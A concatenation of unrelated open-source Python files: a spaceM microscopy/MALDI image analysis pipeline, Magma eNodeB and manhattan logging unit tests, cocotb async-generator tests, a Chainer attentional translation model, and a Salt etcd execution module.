os.makedirs(MF + 'Analysis/')
os.mkdir(MF + 'Analysis/StitchedMicroscopy/')
if preMALDI:
if not os.path.exists(MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/'):
os.makedirs(MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/')
tif_files = spaceM.ImageFileManipulation.manipulations.PixFliplr(
tf,
MF + 'Input/Microscopy/preMALDI/',
MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/')
spaceM.ImageFileManipulation.FIJIcalls.TileConfFormat(path= MF + 'Input/Microscopy/preMALDI/',
dir_fliplr=MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/',
tif_files=tif_files)
gc.collect()
spaceM.ImageFileManipulation.FIJIcalls.callFIJIstitch(MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/')
spaceM.ImageFileManipulation.FIJIcalls.callFIJIstitch_noCompute(dir_in=MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/' + 'other_channels/',
dir_out=MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/')
print('Pre-MALDI Stitching finished')
if postMALDI:
if not os.path.exists(MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/'):
os.makedirs(MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/')
tif_files = spaceM.ImageFileManipulation.manipulations.PixFliplr(
tf,
MF + 'Input/Microscopy/postMALDI/',
MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/')
spaceM.ImageFileManipulation.FIJIcalls.TileConfFormat(path=MF + 'Input/Microscopy/postMALDI/',
dir_fliplr=MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/',
tif_files=tif_files)
gc.collect()
spaceM.ImageFileManipulation.FIJIcalls.callFIJIstitch(MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/')
try:
spaceM.ImageFileManipulation.FIJIcalls.callFIJIstitch_noCompute(dir_in=MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/' + 'other_channels/',
dir_out=MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/')
except FileNotFoundError:
print('Only one channel in postMALDI')
        print('Post-MALDI Stitching finished')
if merge_colors != []:
spaceM.ImageFileManipulation.FIJIcalls.callFIJImergeChannels(
base_path=MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/',
colors=merge_colors,
filenames=merge_filenames,
save_filename='Composite.png')
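# --- Pipeline sketch (comments only; argument values are placeholders) ---
# Typical end-to-end call order for the helpers in this module; real arguments
# depend on the experiment and microscope setup:
#   MF = '/path/to/MainFolder/'
#   stitchMicroscopy(MF, merge_colors=['gray'], merge_filenames=['img_t1_z1_c1.tif'], tf=lambda im: im)
#   ablationMarks_crop(MF);  ablationMarksFilter(MF)
#   fiducialsFinder(MF);     registration(MF)
#   cellSegmentation(MF, merge_colors=['gray'], merge_filenames=['img_t1_z1_c1.tif'], prepCP_fun=lambda mf: None)
#   spatioMolecularMatrix(MF, tf_obj=None)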
def ablationMarksFinder_old(MF):
"""Find the ablation marks on the tile images.
Args:
MF (str): path to the Main Folder.
Data are stored in MF + /Analysis/gridFit/
"""
if not os.path.exists(MF + 'Analysis/gridFit/'):
os.makedirs(MF + 'Analysis/gridFit/')
spaceM.Registration.AblationMarkFinder.MarkFinderFT(MF)
def ablationMarks_crop(MF, im_name='img_t2_z1_c1'):
if not os.path.exists(MF + 'Analysis/gridFit/'):
os.makedirs(MF + 'Analysis/gridFit/')
call(['python', os.path.dirname(GUI_maldi_helper.__file__) + '\\MaldiHelper.py',
MF + 'Analysis\\StitchedMicroscopy\\postMALDI_FLR\\{}'.format(im_name),
MF + 'Analysis\\gridFit\\AM_cropped.tif',
'Select AM, crop, save, close'])
# def ablationMarksFinder_new(MF):
#
# spaceM.Registration.AblationMarkFinder.MarkFinderFT(MF)
def ablationMarksFilter(MF, crop_2ndImg=True, im_crop_source='img_t1_z1_c1', marks_check=True, matrix='DAN'):
"""Filters ablation marks. First by re-running the ablation mark detection on the cropped stitched images where the
    ablation marks are. Then by fitting a theoretical grid on the detections and taking only the closest detection to
    each grid node. This filters out double detections and re-orders the remaining ones into a uniform index which later
    matches the index of the ion image. The detections after filtering can be visualized in 'ili (https://ili.embl.de/).
Args:
MF (str): path to the Main Folder.
        marks_check (bool): whether or not to show the results.
Data are stored in MF + /Analysis/gridFit/
Visualization are stored in MF + /Analysis/gridFit/marks_check/
"""
if crop_2ndImg:
spaceM.Registration.AblationMarkFinder.crop_img(MF, im_p=MF+'Analysis/StitchedMicroscopy/postMALDI_FLR/{}'.format(im_crop_source),
coords_p=MF+'Analysis/gridFit/AM_cropped_coords.npy')
spaceM.Registration.AblationMarkFinder.GridFit(MF, matrix=matrix)
if marks_check:
if not os.path.exists(MF + 'Analysis/gridFit/marks_check/'):
os.makedirs(MF + 'Analysis/gridFit/marks_check/')
spaceM.ImageFileManipulation.manipulations.crop2coords(
MF + 'Analysis/gridFit/xye_clean2.npy',
MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/img_t1_z1_c0',
MF + 'Analysis/gridFit/marks_check/PHASE_crop_bin1x1_window100.tiff',
window=100)
if matrix == 'DHB':
spaceM.ImageFileManipulation.manipulations.crop2coords(
MF + 'Analysis/gridFit/xye_clean2.npy',
MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/img_t2_z1_c1',
MF + 'Analysis/gridFit/marks_check/Fluo_crop_bin1x1_window100.tiff',
window=100)
spaceM.ImageFileManipulation.manipulations.crop2coords(
MF + 'Analysis/gridFit/xye_clean2.npy',
MF + 'Analysis/StitchedMicroscopy/postMALDI_FLR/img_t1_z1_c0',
MF + 'Analysis/gridFit/marks_check/PHASE_crop_bin1x1.png',
window=0)
nbin = spaceM.ImageFileManipulation.FIJIcalls.imbin4ili(
MF + 'Analysis/gridFit/marks_check/PHASE_crop_bin1x1.png',
maxsize=50e6)
predata = spaceM.WriteILIinput.preCSVdatagen(
MF + 'Analysis/gridFit/xye_clean2.npy',
radius=10,
nbin=nbin,
PlainFirst=True)
spaceM.WriteILIinput.writeCSV(
path=MF + 'Analysis/gridFit/marks_check/ablation_marks_checkDETECTIONS.csv',
data=predata)
predata = spaceM.WriteILIinput.preCSVdatagen(
MF + 'Analysis/gridFit/xye_grid.npy',
radius=10,
nbin=nbin,
PlainFirst=True)
spaceM.WriteILIinput.writeCSV(
path=MF + 'Analysis/gridFit/marks_check/ablation_marks_checkTHEORETICAL.csv',
data=predata)
if not os.path.exists(MF + 'Analysis/gridFit/marksMask.npy'):
spaceM.Registration.AblationMarkFinder.regionGrowingAblationMarks(MF,
grow_thresh=0.60,
blur=False,
sigma=2,
matrix='DAN',
refine_seed=True,
FT_filtered=False,
maxDist=20) # blur=True and grow_thresh=0.25 for DAN
spaceM.Registration.AblationMarkFinder.AM_filter(MF, n_std=4)
def fiducialsFinder(MF):
"""Find the fiducials coordinates on the stitched images.
Args:
MF (str): path to the Main Folder.
Data are stored in MF + /Analysis/Fiducials/
"""
if not os.path.exists(MF + 'Analysis/Fiducials/'):
os.makedirs(MF + 'Analysis/Fiducials/')
spaceM.Registration.ImageRegistration.penMarksFeatures(MF, prefix='post')
spaceM.Registration.ImageRegistration.penMarksFeatures(MF, prefix='pre')
def registration(MF, tf_obj='dummy', do_transform=True, do_ili=True, ili_fdr=0.1):
if not os.path.exists(MF + 'Analysis/Fiducials/optimized_params.npy'):
spaceM.Registration.ImageRegistration.fiducialsAlignment(MF,
src=MF+'Analysis/Fiducials/postXYpenmarks.npy',
dst=MF+'Analysis/Fiducials/preXYpenmarks.npy')
if do_transform:
spaceM.Registration.ImageRegistration.TransformMarks(MF)
if do_ili:
if not os.path.exists(MF + 'Analysis/ili/'):
os.makedirs(MF + 'Analysis/ili/')
if not os.path.exists(MF + 'Analysis/ili/FLUO_crop_bin1x1.png'):
spaceM.ImageFileManipulation.manipulations.crop2coords(
coords_p=MF + 'Analysis/Fiducials/transformedMarks.npy',
img_p=MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/Composite.png',
save_p=MF + 'Analysis/ili/FLUO_crop_bin1x1.png',
window=0)
spaceM.ImageFileManipulation.manipulations.crop2coords(
MF + 'Analysis/Fiducials/transformedMarks.npy',
MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/Composite.png',
MF + 'Analysis/ili/FLUO_crop_bin1x1_window100.png',
window=100)
gc.collect()
nbin = spaceM.ImageFileManipulation.FIJIcalls.imbin4ili(MF + 'Analysis/ili/FLUO_crop_bin1x1.png', maxsize=50e6)
spaceM.WriteILIinput.annotationSM2CSV(
MFA=MF + 'Analysis/',
MFI=MF + 'Input/',
fdr=ili_fdr,
nbin=nbin,
radius=20,
tf_obj=tf_obj,
db='HMDB-v4')
def cellSegmentation(MF,
merge_colors,
merge_filenames,
prepCP_fun):
if not os.path.exists(MF + 'Analysis/CellProfilerAnalysis/'):
os.makedirs(MF + 'Analysis/CellProfilerAnalysis/')
CP_window = 100
spaceM.ImageFileManipulation.manipulations.crop2coords4CP(
MF + 'Analysis/Fiducials/transformedMarks.npy',
MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/',
MF + 'Analysis/CellProfilerAnalysis/',
window=CP_window)
spaceM.ImageFileManipulation.manipulations.crop2coords(
MF + 'Analysis/Fiducials/transformedMarks.npy',
MF + 'Analysis/StitchedMicroscopy/preMALDI_FLR/Composite.png',
MF + 'Analysis/CellProfilerAnalysis/Composite_window100_adjusted.png',
window=CP_window)
gc.collect()
prepCP_fun(MF)
    print('Start CellProfiler Analysis')
cp_p = getPath('CellProfiler path')
cppipe_p = getPath('CellProfiler pipeline path')
spaceM.scAnalysis.Segmentation.callCP(MF + 'Analysis/', cp_p, cppipe_p)
    print('Finished CellProfiler Analysis')
CP_window = 100
spaceM.scAnalysis.Segmentation.cellOutlines_fast(MF + 'Analysis/CellProfilerAnalysis/Composite_window100_adjusted.png',
CP_window,
MF + 'Analysis/CellProfilerAnalysis/Labelled_cells.tiff',
MF + 'Analysis/CellProfilerAnalysis/Contour_cells_adjusted.png')
def spatioMolecularMatrix(MF, tf_obj, CDs=[2], fetch_ann = 'online', filter = 'correlation', tol_fact = -0.2, hdf5_path='dummy'):
if not os.path.exists(MF + 'Analysis/scAnalysis/'):
os.makedirs(MF + 'Analysis/scAnalysis/')
# spaceM.scAnalysis.scAnalysis.defMORPHfeatures(MF)
# fetch_ann = 'online' # either 'online' or 'offline'
# either 'mean' or 'correlation'
spaceM.scAnalysis.scAnalysis_refactored.defMOLfeatures(
MF,
tf_obj=tf_obj,
CDs=CDs,
norm_method='weighted_mean_sampling_area_MarkCell_overlap_ratio_sampling_area',
fetch_ann=fetch_ann, tol_fact=tol_fact, filter=filter, hdf5_path=hdf5_path)
spaceM.scAnalysis.scAnalysis_refactored.mergeMORPHnMOL(
MF,
CDs=CDs,
fetch_ann=fetch_ann,
tol_fact=tol_fact,
filter=filter) |
py | b415befe8c5aec085e5d7d1a4c5cebefb0dab9f9 | default_app_config = 'mayan.apps.document_signatures.apps.DocumentSignaturesApp'
|
py | b415c0b3f03dc493fa9de3af0756024851aac761 | """
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# pylint: disable=protected-access
from unittest import TestCase
from magma.enodebd.devices.device_utils import (
EnodebDeviceName,
_parse_sw_version,
get_device_name,
)
from magma.enodebd.exceptions import UnrecognizedEnodebError
class EnodebConfigUtilsTest(TestCase):
def test_get_device_name(self) -> None:
# Baicells
oui = '34ED0B'
version = 'BaiStation_V100R001C00B110SPC003'
data_model = get_device_name(oui, version)
expected = EnodebDeviceName.BAICELLS
self.assertEqual(data_model, expected, 'Incorrect data model')
# Baicells before bug-fix
oui = '34ED0B'
version = 'BaiStation_V100R001C00B110SPC002'
data_model = get_device_name(oui, version)
expected = EnodebDeviceName.BAICELLS_OLD
self.assertEqual(data_model, expected, 'Incorrect data model')
# Baicells QAFB
oui = '48BF74'
version = 'BaiBS_QAFB_some_version'
data_model = get_device_name(oui, version)
expected = EnodebDeviceName.BAICELLS_QAFB
self.assertEqual(data_model, expected, 'Incorrect data model')
# Cavium
oui = '000FB7'
version = 'Some version of Cavium'
data_model = get_device_name(oui, version)
expected = EnodebDeviceName.CAVIUM
self.assertEqual(data_model, expected, 'Incorrect data model')
# Unsupported device OUI
oui = 'beepboopbeep'
version = 'boopboopboop'
with self.assertRaises(UnrecognizedEnodebError):
get_device_name(oui, version)
# Unsupported software version for Baicells
oui = '34ED0B'
version = 'blingblangblong'
with self.assertRaises(UnrecognizedEnodebError):
get_device_name(oui, version)
def test_parse_version(self):
""" Test that version string is parsed correctly """
self.assertEqual(
_parse_sw_version('BaiStation_V100R001C00B110SPC003'),
[100, 1, 0, 110, 3],
)
self.assertEqual(
_parse_sw_version('BaiStation_V100R001C00B060SPC012'),
[100, 1, 0, 60, 12],
)
self.assertEqual(
_parse_sw_version('BaiStation_V100R001C00B060SPC012_FB_3'),
[100, 1, 0, 60, 12],
)
# Incorrect number of digits
self.assertEqual(
_parse_sw_version('BaiStation_V10R001C00B060SPC012'),
None,
)
self.assertEqual(
_parse_sw_version('XYZ123'),
None,
)
self.assertEqual(
_parse_sw_version(''),
None,
)
|
py | b415c2278b5d8da6407802f9254761535d647bad | c = 0
while c <= 100:
print(c)
c += 1 |
py | b415c2fae5de7d3456d8ab73c7a93bc889a705da | from __future__ import absolute_import, division, print_function
import json
import os
import time
from threading import Thread
from unittest import TestCase
from manhattan.log.remote import make_redis, server, RemoteLog, RemoteLogServer
from manhattan.log.timerotating import TimeRotatingLog
REDIS_KEY = 'manhattan:testing:log:queue'
class ServerThread(Thread):
def __init__(self, log_server):
self.log_server = log_server
super(ServerThread, self).__init__()
def run(self):
self.log_server.run()
class TestRemoteLog(TestCase):
@classmethod
def setUpClass(cls):
cls.text_log = TimeRotatingLog('/tmp/manhattan-tests/remote.log')
cls.log = RemoteLog(key=REDIS_KEY)
for f in cls._get_log_files():
os.remove(f)
cls.log.db.delete(REDIS_KEY)
@classmethod
def _get_log_files(cls):
files = []
dirname = os.path.dirname(cls.text_log.path)
for f in os.listdir(dirname):
if f.startswith('remote.log'):
files.append(os.path.join(dirname, f))
return files
def test_01_enqueue(self):
record = ['a', 'b', 'c']
self.log.write(record)
item = self.log.db.lpop(REDIS_KEY)
stored_record = json.loads(item)[0]
self.assertEqual(stored_record, record)
self.assertEqual(self.log.db.llen(REDIS_KEY), 0)
def test_02_consume(self):
log_server = RemoteLogServer(self.text_log, key=REDIS_KEY)
log_server_thread = ServerThread(log_server)
self.log.write(['a', 'b', 'c'])
self.log.write(['x', 'y', 'z'])
log_server_thread.start()
self.log.write(['1', '2', '3'])
time.sleep(0.5)
log_file = self._get_log_files()[0]
with open(log_file) as fp:
lines = fp.readlines()
self.assertEqual(len(lines), 3)
self.assertEqual(self.log.db.llen(REDIS_KEY), 0)
self.log.send_command('STOP')
def test_server_script(self):
"""Create and immediately stop server."""
self.log.send_command('STOP')
server(['--key', REDIS_KEY])
self.assertEqual(self.log.db.llen(REDIS_KEY), 0)
def test_make_redis(self):
redis = make_redis({'socket_timeout': 1}, socket_timeout=2)
connection = redis.connection_pool.make_connection()
self.assertEqual(connection.socket_timeout, 1)
redis.rpush(REDIS_KEY, 'a')
self.assertEqual(redis.lpop(REDIS_KEY), 'a')
self.assertEqual(redis.llen(REDIS_KEY), 0)
|
py | b415c2ff865d9d9a45e219ac44178993d95958e3 | #!/usr/bin/python3
import my_settings
import sys
import math
import numpy as np
from argparse import ArgumentParser
from chainer import functions, optimizers
import chainer.computational_graph as cg
import util.generators as gens
from util.functions import trace, fill_batch2
from util.model_file import ModelFile
from util.vocabulary import Vocabulary
#from util.chainer_cpu_wrapper import wrapper
from util.chainer_gpu_wrapper import wrapper
class AttentionalTranslationModel:
def __init__(self):
pass
def __make_model(self):
self.__model = wrapper.make_model(
# input embedding
w_xi = functions.EmbedID(len(self.__src_vocab), self.__n_embed),
# forward encoder
w_ia = functions.Linear(self.__n_embed, 4 * self.__n_hidden),
w_aa = functions.Linear(self.__n_hidden, 4 * self.__n_hidden),
# backward encoder
w_ib = functions.Linear(self.__n_embed, 4 * self.__n_hidden),
w_bb = functions.Linear(self.__n_hidden, 4 * self.__n_hidden),
# attentional weight estimator
w_aw = functions.Linear(self.__n_hidden, self.__n_hidden),
w_bw = functions.Linear(self.__n_hidden, self.__n_hidden),
w_pw = functions.Linear(self.__n_hidden, self.__n_hidden),
w_we = functions.Linear(self.__n_hidden, 1),
# decoder
w_ap = functions.Linear(self.__n_hidden, self.__n_hidden),
w_bp = functions.Linear(self.__n_hidden, self.__n_hidden),
w_yp = functions.EmbedID(len(self.__trg_vocab), 4 * self.__n_hidden),
w_pp = functions.Linear(self.__n_hidden, 4 * self.__n_hidden),
w_cp = functions.Linear(self.__n_hidden, 4 * self.__n_hidden),
w_dp = functions.Linear(self.__n_hidden, 4 * self.__n_hidden),
w_py = functions.Linear(self.__n_hidden, len(self.__trg_vocab)),
)
@staticmethod
def new(src_vocab, trg_vocab, n_embed, n_hidden):
self = AttentionalTranslationModel()
self.__src_vocab = src_vocab
self.__trg_vocab = trg_vocab
self.__n_embed = n_embed
self.__n_hidden = n_hidden
self.__make_model()
return self
def save(self, filename):
with ModelFile(filename, 'w') as fp:
self.__src_vocab.save(fp.get_file_pointer())
self.__trg_vocab.save(fp.get_file_pointer())
fp.write(self.__n_embed)
fp.write(self.__n_hidden)
wrapper.begin_model_access(self.__model)
fp.write_embed(self.__model.w_xi)
fp.write_linear(self.__model.w_ia)
fp.write_linear(self.__model.w_aa)
fp.write_linear(self.__model.w_ib)
fp.write_linear(self.__model.w_bb)
fp.write_linear(self.__model.w_aw)
fp.write_linear(self.__model.w_bw)
fp.write_linear(self.__model.w_pw)
fp.write_linear(self.__model.w_we)
fp.write_linear(self.__model.w_ap)
fp.write_linear(self.__model.w_bp)
fp.write_embed(self.__model.w_yp)
fp.write_linear(self.__model.w_pp)
fp.write_linear(self.__model.w_cp)
fp.write_linear(self.__model.w_dp)
fp.write_linear(self.__model.w_py)
wrapper.end_model_access(self.__model)
@staticmethod
def load(filename):
self = AttentionalTranslationModel()
with ModelFile(filename) as fp:
self.__src_vocab = Vocabulary.load(fp.get_file_pointer())
self.__trg_vocab = Vocabulary.load(fp.get_file_pointer())
self.__n_embed = int(fp.read())
self.__n_hidden = int(fp.read())
self.__make_model()
wrapper.begin_model_access(self.__model)
fp.read_embed(self.__model.w_xi)
fp.read_linear(self.__model.w_ia)
fp.read_linear(self.__model.w_aa)
fp.read_linear(self.__model.w_ib)
fp.read_linear(self.__model.w_bb)
fp.read_linear(self.__model.w_aw)
fp.read_linear(self.__model.w_bw)
fp.read_linear(self.__model.w_pw)
fp.read_linear(self.__model.w_we)
fp.read_linear(self.__model.w_ap)
fp.read_linear(self.__model.w_bp)
fp.read_embed(self.__model.w_yp)
fp.read_linear(self.__model.w_pp)
fp.read_linear(self.__model.w_cp)
fp.read_linear(self.__model.w_dp)
fp.read_linear(self.__model.w_py)
wrapper.end_model_access(self.__model)
return self
def init_optimizer(self):
self.__opt = optimizers.AdaGrad(lr=0.01)
self.__opt.setup(self.__model)
def __forward(self, is_training, src_batch, trg_batch = None, generation_limit = None):
m = self.__model
tanh = functions.tanh
lstm = functions.lstm
batch_size = len(src_batch)
hidden_size = self.__n_hidden
src_len = len(src_batch[0])
trg_len = len(trg_batch[0]) - 1 if is_training else generation_limit
src_stoi = self.__src_vocab.stoi
trg_stoi = self.__trg_vocab.stoi
trg_itos = self.__trg_vocab.itos
hidden_zeros = wrapper.zeros((batch_size, hidden_size))
sum_e_zeros = wrapper.zeros((batch_size, 1))
# make embedding
list_x = []
for l in range(src_len):
s_x = wrapper.make_var([src_stoi(src_batch[k][l]) for k in range(batch_size)], dtype=np.int32)
list_x.append(s_x)
# forward encoding
c = hidden_zeros
s_a = hidden_zeros
list_a = []
for l in range(src_len):
s_x = list_x[l]
s_i = tanh(m.w_xi(s_x))
c, s_a = lstm(c, m.w_ia(s_i) + m.w_aa(s_a))
list_a.append(s_a)
# backward encoding
c = hidden_zeros
s_b = hidden_zeros
list_b = []
for l in reversed(range(src_len)):
s_x = list_x[l]
s_i = tanh(m.w_xi(s_x))
c, s_b = lstm(c, m.w_ib(s_i) + m.w_bb(s_b))
list_b.insert(0, s_b)
# decoding
c = hidden_zeros
s_p = tanh(m.w_ap(list_a[-1]) + m.w_bp(list_b[0]))
s_y = wrapper.make_var([trg_stoi('<s>') for k in range(batch_size)], dtype=np.int32)
hyp_batch = [[] for _ in range(batch_size)]
accum_loss = wrapper.zeros(()) if is_training else None
#for n in range(src_len):
# print(src_batch[0][n], end=' ')
#print()
for l in range(trg_len):
# calculate attention weights
list_e = []
sum_e = sum_e_zeros
for n in range(src_len):
s_w = tanh(m.w_aw(list_a[n]) + m.w_bw(list_b[n]) + m.w_pw(s_p))
r_e = functions.exp(m.w_we(s_w))
#list_e.append(functions.concat(r_e for _ in range(self.__n_hidden)))
list_e.append(r_e)
sum_e += r_e
#sum_e = functions.concat(sum_e for _ in range(self.__n_hidden))
# make attention vector
s_c = hidden_zeros
s_d = hidden_zeros
for n in range(src_len):
s_e = list_e[n] / sum_e
#s_c += s_e * list_a[n]
#s_d += s_e * list_b[n]
s_c += functions.reshape(functions.batch_matmul(list_a[n], s_e), (batch_size, hidden_size))
s_d += functions.reshape(functions.batch_matmul(list_b[n], s_e), (batch_size, hidden_size))
#zxcv = wrapper.get_data(s_e)[0][0]
#if zxcv > 0.9: asdf='#'
#elif zxcv > 0.7: asdf='*'
#elif zxcv > 0.3: asdf='+'
#elif zxcv > 0.1: asdf='.'
#else: asdf=' '
#print(asdf * len(src_batch[0][n]), end=' ')
# generate next word
c, s_p = lstm(c, m.w_yp(s_y) + m.w_pp(s_p) + m.w_cp(s_c) + m.w_dp(s_d))
r_y = m.w_py(s_p)
output = wrapper.get_data(r_y).argmax(1)
for k in range(batch_size):
hyp_batch[k].append(trg_itos(output[k]))
#print(hyp_batch[0][-1])
if is_training:
s_t = wrapper.make_var([trg_stoi(trg_batch[k][l + 1]) for k in range(batch_size)], dtype=np.int32)
accum_loss += functions.softmax_cross_entropy(r_y, s_t)
s_y = s_t
else:
if all(hyp_batch[k][-1] == '</s>' for k in range(batch_size)): break
s_y = wrapper.make_var(output, dtype=np.int32)
return hyp_batch, accum_loss
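    # Note on the attention step above (descriptive comments only): for each
    # source position n, the scalar score r_e = exp(w_we(tanh(...))) is divided
    # by sum_e, and the context vectors are the weighted sums
    #     s_c = sum_n (e_n / sum_e) * a_n,   s_d = sum_n (e_n / sum_e) * b_n,
    # which is what the batch_matmul/reshape calls implement per batch element.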
def train(self, src_batch, trg_batch):
self.__opt.zero_grads()
hyp_batch, accum_loss = self.__forward(True, src_batch, trg_batch=trg_batch)
#g = cg.build_computational_graph([accum_loss])
#with open('asdf', 'w') as fp: fp.write(g.dump())
#sys.exit()
accum_loss.backward()
self.__opt.clip_grads(10)
self.__opt.update()
return hyp_batch
def predict(self, src_batch, generation_limit):
return self.__forward(False, src_batch, generation_limit=generation_limit)[0]
def parse_args():
def_vocab = 32768
def_embed = 256
def_hidden = 512
def_epoch = 100
def_minibatch = 64
def_generation_limit = 256
p = ArgumentParser(description='Attentional neural machine translation')
p.add_argument('mode', help='\'train\' or \'test\'')
p.add_argument('source', help='[in] source corpus')
p.add_argument('target', help='[in/out] target corpus')
p.add_argument('model', help='[in/out] model file')
p.add_argument('--vocab', default=def_vocab, metavar='INT', type=int,
help='vocabulary size (default: %d)' % def_vocab)
p.add_argument('--embed', default=def_embed, metavar='INT', type=int,
help='embedding layer size (default: %d)' % def_embed)
p.add_argument('--hidden', default=def_hidden, metavar='INT', type=int,
help='hidden layer size (default: %d)' % def_hidden)
p.add_argument('--epoch', default=def_epoch, metavar='INT', type=int,
help='number of training epoch (default: %d)' % def_epoch)
p.add_argument('--minibatch', default=def_minibatch, metavar='INT', type=int,
help='minibatch size (default: %d)' % def_minibatch)
p.add_argument('--generation-limit', default=def_generation_limit, metavar='INT', type=int,
help='maximum number of words to be generated for test input')
args = p.parse_args()
# check args
try:
if args.mode not in ['train', 'test']: raise ValueError('you must set mode = \'train\' or \'test\'')
if args.vocab < 1: raise ValueError('you must set --vocab >= 1')
if args.embed < 1: raise ValueError('you must set --embed >= 1')
if args.hidden < 1: raise ValueError('you must set --hidden >= 1')
if args.epoch < 1: raise ValueError('you must set --epoch >= 1')
if args.minibatch < 1: raise ValueError('you must set --minibatch >= 1')
if args.generation_limit < 1: raise ValueError('you must set --generation-limit >= 1')
except Exception as ex:
p.print_usage(file=sys.stderr)
print(ex, file=sys.stderr)
sys.exit()
return args
def train_model(args):
trace('making vocabularies ...')
src_vocab = Vocabulary.new(gens.word_list(args.source), args.vocab)
trg_vocab = Vocabulary.new(gens.word_list(args.target), args.vocab)
trace('making model ...')
model = AttentionalTranslationModel.new(src_vocab, trg_vocab, args.embed, args.hidden)
for epoch in range(args.epoch):
trace('epoch %d/%d: ' % (epoch + 1, args.epoch))
trained = 0
gen1 = gens.word_list(args.source)
gen2 = gens.word_list(args.target)
gen3 = gens.batch(gens.sorted_parallel(gen1, gen2, 100 * args.minibatch, order=0), args.minibatch)
model.init_optimizer()
for src_batch, trg_batch in gen3:
src_batch = fill_batch2(src_batch)
trg_batch = fill_batch2(trg_batch)
K = len(src_batch)
hyp_batch = model.train(src_batch, trg_batch)
for k in range(K):
trace('epoch %3d/%3d, sample %8d' % (epoch + 1, args.epoch, trained + k + 1))
trace(' src = ' + ' '.join([x if x != '</s>' else '*' for x in src_batch[k]]))
trace(' trg = ' + ' '.join([x if x != '</s>' else '*' for x in trg_batch[k]]))
trace(' hyp = ' + ' '.join([x if x != '</s>' else '*' for x in hyp_batch[k]]))
trained += K
trace('saving model ...')
model.save(args.model + '.%03d' % (epoch + 1))
trace('finished.')
def test_model(args):
trace('loading model ...')
model = AttentionalTranslationModel.load(args.model)
trace('generating translation ...')
generated = 0
with open(args.target, 'w') as fp:
for src_batch in gens.batch(gens.word_list(args.source), args.minibatch):
src_batch = fill_batch2(src_batch)
K = len(src_batch)
trace('sample %8d - %8d ...' % (generated + 1, generated + K))
hyp_batch = model.predict(src_batch, args.generation_limit)
for hyp in hyp_batch:
hyp.append('</s>')
hyp = hyp[:hyp.index('</s>')]
print(' '.join(hyp), file=fp)
generated += K
trace('finished.')
def main():
args = parse_args()
trace('initializing ...')
wrapper.init()
if args.mode == 'train': train_model(args)
elif args.mode == 'test': test_model(args)
if __name__ == '__main__':
main()
|
py | b415c336751b5309f2391c10178235e7701d0d99 | # Copyright cocotb contributors
# Licensed under the Revised BSD License, see LICENSE for details.
# SPDX-License-Identifier: BSD-3-Clause
import cocotb
async def whoops_async_generator():
# the user should have used `await` here, but they wrote `yield` by accident.
yield cocotb.triggers.Timer(1)
@cocotb.test() # testing async generator in legacy coroutine syntax
def test_yielding_accidental_async_generator(dut):
# this test deliberately does not use `async def`, as we are testing the behavior of `yield`
try:
yield whoops_async_generator()
except TypeError as e:
assert "async generator" in str(e)
else:
assert False, "should have thrown"
@cocotb.test()
async def test_forking_accidental_async_generator(dut):
try:
cocotb.start_soon(whoops_async_generator())
except TypeError as e:
assert "async generator" in str(e)
else:
assert False, "should have thrown"
@cocotb.coroutine # testing cocotb.coroutine decorated async generator
async def whoops_async_generator_decorated():
yield cocotb.triggers.Timer(1)
@cocotb.test()
async def test_decorating_accidental_async_generator(dut):
try:
await whoops_async_generator_decorated()
except TypeError as e:
assert "async generator" in str(e)
else:
assert False, "should have thrown"
|
py | b415c35dd729351342ef710fa1563d534c2ef5a9 | # -*- coding: utf-8 -*-
'''
Execution module to work with etcd
:depends: - python-etcd
In order to use an etcd server, a profile should be created in the master
configuration file:
.. code-block:: yaml
    my_etcd_config:
etcd.host: 127.0.0.1
etcd.port: 4001
It is technically possible to configure etcd without using a profile, but this
is not considered to be a best practice, especially when multiple etcd servers or
clusters are available.
.. code-block:: yaml
etcd.host: 127.0.0.1
etcd.port: 4001
'''
# Import python libs
import logging
# Import third party libs
try:
import salt.utils.etcd_util
HAS_LIBS = True
except Exception:
HAS_LIBS = False
__virtualname__ = 'etcd'
# Set up logging
log = logging.getLogger(__name__)
# Define a function alias in order not to shadow built-in's
__func_alias__ = {
'get_': 'get',
'set_': 'set',
'rm_': 'rm',
'ls_': 'ls'
}
def __virtual__():
'''
Only return if python-etcd is installed
'''
return __virtualname__ if HAS_LIBS else False
def get_(key, recurse=False, profile=None):
'''
Get a value from etcd, by direct path
CLI Examples:
salt myminion etcd.get /path/to/key
salt myminion etcd.get /path/to/key profile=my_etcd_config
salt myminion etcd.get /path/to/key recurse=True profile=my_etcd_config
'''
client = salt.utils.etcd_util.get_conn(__opts__, profile)
result = client.get(key)
if recurse:
return salt.utils.etcd_util.tree(client, key)
else:
return result.value
def set_(key, value, profile=None):
'''
Set a value in etcd, by direct path
CLI Example:
salt myminion etcd.set /path/to/key value
salt myminion etcd.set /path/to/key value profile=my_etcd_config
'''
client = salt.utils.etcd_util.get_conn(__opts__, profile)
return client.write(key, value)
def ls_(path='/', profile=None):
'''
Return all keys and dirs inside a specific path
CLI Example:
salt myminion etcd.ls /path/to/dir/
salt myminion etcd.ls /path/to/dir/ profile=my_etcd_config
'''
ret = {}
client = salt.utils.etcd_util.get_conn(__opts__, profile)
items = client.get(path)
for item in items.children:
if item.dir is True:
dir_name = '{0}/'.format(item.key)
ret[dir_name] = {}
else:
ret[item.key] = item.value
return {path: ret}
